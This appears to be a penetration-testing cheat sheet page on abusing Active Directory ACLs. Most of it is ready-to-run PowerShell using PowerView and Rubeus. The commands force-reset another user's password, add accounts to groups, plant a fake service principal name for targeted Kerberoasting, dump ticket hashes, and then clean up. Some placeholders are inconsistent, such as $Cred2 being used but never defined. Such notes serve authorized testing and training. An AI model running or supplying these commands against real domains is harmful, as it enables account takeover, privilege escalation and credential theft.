Abusing ACLs

# Creating a PSCredential Object
$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword)

# Creating a SecureString Object
$anotheruserPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force

# Changing the User's Password
Import-Module .\\PowerView.ps1
Set-DomainUserPassword -Identity anotheruser -AccountPassword $anotheruserPassword -Credential $Cred -Verbose

# Adding user to a Group
Add-DomainGroupMember -Identity 'GROUP NAME' -Members 'USER' -Credential $Cred2 -Verbose

# Checking if user exists in a group 
Get-ADGroup -Identity "GROUP NAME" -Properties * | Select -ExpandProperty Members

# Confirming user was Added to the Group
Get-DomainGroupMember -Identity "GROUP NAME" | Select MemberName

# Creating a Fake SPN
# We must be authenticated as a member of the Information Technology group for this to be successful
Set-DomainObject -Credential $Cred2 -Identity user -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

# Kerberoasting with Rubeus
.\\Rubeus.exe kerberoast /user:eren /nowrap

# Removing the Fake SPN from user's Account
Set-DomainObject -Credential $Cred2 -Identity user -Clear serviceprincipalname -Verbose

# Removing damundsen from the Group we added
Remove-DomainGroupMember -Identity "GROUP NAME" -Members 'user' -Credential $Cred2 -Verbose
PreviousEnumerationNextDCSync

Last updated